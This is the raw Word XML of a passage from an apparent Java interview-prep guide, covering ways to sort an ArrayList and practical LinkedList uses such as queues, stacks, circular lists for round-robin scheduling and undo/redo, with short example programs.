          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections.reverseOrder()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a comparator to the sort() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D09C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8DA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C2C3E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486C3248" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D1D5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Descending {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC74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74D4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1A064C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EBCC3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2A951D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5A5103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186C30E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99BD6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EE6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172048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 Collections.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C864F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B49C3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D922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in Descending Order: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130797A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1F46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8F9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D31B2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in Descending Order: [8, 5, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB3F0A"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orting using List.sort() (Java 8 and Later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E3AE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and later, you can use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which internally uses the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B46625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637AD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0FB7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9B8CE0F" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C5DB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UsingListSort {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E747E5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1FCB6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0CCA71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list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7121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82C86A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F379C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038BF0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A893A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903F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51F127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Integer::compareTo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8694B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0380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260CB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666DB08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1AB9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5AEB5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80294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65FACDE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orting with a Custom Comparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9C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define a custom sorting order by implement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For example, sorting in descending order using a custom comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBE03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9497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78448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28D13E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E48A3B1" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BCB0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CustomComparator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C20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831D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6F06170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7ADA41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3B7D8D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5AB304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20B978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660423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7E0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 using a custom comparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD86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new Comparator&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1F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12E69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Integer o1, Integer o2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8EE7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2 - o1;  // Descending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31595A3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6CF7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B0E5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812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CCBB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with Custom Comparator: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751A9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EC9E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5A9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4BE32D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with Custom Comparator: [8, 5, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB23456"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orting a List of Custom Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E77E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list of custom objects (e.g., Employee objects), you can sort them using a Comparator based on one or more fields of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E997B6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121077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B2979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296EC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D8B2CCA" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F424E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0DCC32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DC55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6E9E69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40BF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4CEEEB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4CF94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A8104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9AB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4ADC1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6E9799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75E9F0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 + " (" + age + ")";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC2C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C9AA9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A1ACC2" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596D62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CustomObjects {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478C66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60795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681BFE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15027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1B8C32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22));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82FD0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218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by age (ascending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E615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employees, Comparator.comparingInt(emp -&gt; emp.age));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DA1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1CE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list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB65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Employees by Age: " + employees);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF852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78EA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D743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A506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Employees by Age: [Bob (22), John (25), Alice (30)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC56B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A987524"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to sort an ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2AFE2"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sort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using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reverseOrder()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a custom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EB247B9" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>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ustom object sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, implement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xml:space="preserve"> and pass it to the sort method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38BE73" w14:textId="439913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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEE9DA" w14:textId="77777777" w:rsidR="000644F2" w:rsidRPr="00CE4B95" w:rsidRDefault="000644F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc197867364"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the practical use cases of LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="571ADD73" w14:textId="04F8ACED"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Java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implemented a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It is especially useful in scenarios where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re needed because of its </w:t>
      </w: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and the ability to easily add or remove elements without needing to resize or shift other elements (un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AE726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are some practical use cases wher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preferred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6782EF"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plementing Queues and Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16B011"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is a data structure that follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>First In, First Out (FIFO)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principl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for implementing a queue because of its fast insertions and deletions at both ends (head and tail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D3A38"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llows the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principle, where the last element added is the first to be removed. You can us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to implement a stack, leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push()</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xml:space="preserve"> methods for efficient operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F39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Queue Implementation using LinkedList):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E94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4336CE7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Queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B0611" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4490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QueueExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076535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BBD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lt;Integer&gt; queue = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522435F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36604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queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17613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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8B53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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D216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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740824A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72A3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elements from the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04031C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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662C4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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619DB6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0334B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0A4E1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tack Implementation using LinkedList):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25617F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286F9F1B" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D378F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ackExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379924A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20054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stack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77D3E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A287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shing elements onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBEBF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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7AD7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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357547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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58508B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011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opping elements from the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35389D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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFAA0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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A1E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4E975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119B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erting and Deleting Elements Frequently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478503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 application requires frequent insertion or deletion of elements from both ends (head and tail) or from the midd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 better choice th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his is becaus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ha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lastRenderedPageBreak/>
        <w:t xml:space="preserve">for adding and removing elements at the beginning and end, whil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for adding/removing elements at arbitrary positions due to the need for shifting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA666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serting and Removing Elements from the Middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226A92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032FD33" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F287F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InsertionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB6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ADD3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EAA1C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0F60B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elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD73F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05579D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0D3B995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4276D2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6A3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beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597078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First(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD39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F5B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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F54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Last(40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9A5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D2A5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in the middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDAD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 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6E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56D0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 + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319BE1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AA4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e elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D189B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First();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DD8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Last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48009B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0E1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after removal: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF389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B7C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ECEF5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6A7D6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5, 10, 25, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB93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after removal: [10, 25, 20, 30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7FA18"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ing Doubly Linked Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D227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a data structure that supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traversing in both directions (forward and backwar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because it’s a doubly linked list. This is useful in situations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>navigation system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ndo/redo functional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i-directional traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039063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raversing in Both Directions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF38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B26CB1D" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4ADF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oublyLinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056320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EFD7B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7A3321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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16956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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94AB9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87D5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078C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forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0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orward traversal:");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C039CD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item : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3D4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m);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AD19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67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FC9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backward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C24D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Backward traversal:");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2325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list.size() - 1; i &gt;= 0; i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568337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i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B0DC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BA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80C1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98CCD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AF8150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 traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B5F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8A7D0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68FBAC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1A126F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ward traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046611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37071B8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26B6D2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EA99F33"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Efficient for Large Data Sets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D50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oes not have to pre-allocate a fixed block of memory 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ircular Linked Lists for Applications like Round Robin Scheduling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414411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ircular linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of linked list where the last node points to the first node, creating a circular structure. It’s useful in applications like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>round-robin scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for fair CPU scheduling), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cach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uffer management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B572C0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ircular Linked List for Round Robin Scheduling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FF5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Node {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA1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61EEAA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next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00055B" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DA35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int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933CD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ata = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D9A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2BD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AEFA68" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC958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ircularLinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F917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5CBE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head = new Node(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400468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 = new Node(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199ED18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 = new Node(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA21F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 = new Node(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57567B8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next = head;  // Circular link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD4EF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5C50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circular linked list (will print indefinitely if not controlled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689ED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current = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477E2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 i++) {  // Only 10 iterations to avoid infinite loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643A0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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6EF9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urrent = current.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5628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5F144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9993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CC46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Undo/Redo Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997DDC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pplications like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>text editor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raphical design too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gaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, undo and redo features can be implemented using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ach action (like a drawing operation or text entry) is saved as a node in the list, and moving backward or forward through the list allows you to undo or redo operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223781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ndo/Redo using LinkedList (simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C262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5D57C30D" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE2B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UndoRedoExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F4029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D14AA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undoStack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2D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redoStack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355666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A872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actions to the undo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3320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1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577ED48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2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC40B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3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CA2F8" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F44FE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do an action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6F3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ndoneAction = undoStack.pop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55571D8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oStack.push(undoneAction);  // Save undone action to redo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A140076" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6268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do an action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F510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doneAction = redoStack.pop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4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redoneAction);  // Restore redone action to undo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE797F3" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
